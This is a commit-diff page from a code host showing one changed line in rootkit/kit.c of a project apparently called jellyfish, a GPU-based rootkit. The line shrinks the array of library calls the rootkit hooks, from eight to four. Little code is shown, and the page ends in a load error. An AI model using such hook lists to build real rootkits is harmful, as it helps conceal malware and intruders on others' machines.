Projects STRLCPY jellyfish Commits 39a8f9a7
🤬
  • ■ ■ ■ ■
    rootkit/kit.c
    skipped 15 lines
    16 16  #include "packet.h"
    17 17  #include "pcap.h"
    18 18   
    19  -const char *syscall_table[8] = {"fopen", "mkdir", "lstat", "lstat64", "creat", "execve", "open", "pcap_loop"};
     19 +const char *syscall_table[8] = {"fopen", "mkdir", "creat", "pcap_loop"};
    20 20   
    21 21  // get gpu device
    22 22  cl_device_id create_device(){
    skipped 355 lines
Please wait...
Page is in error, reload to recover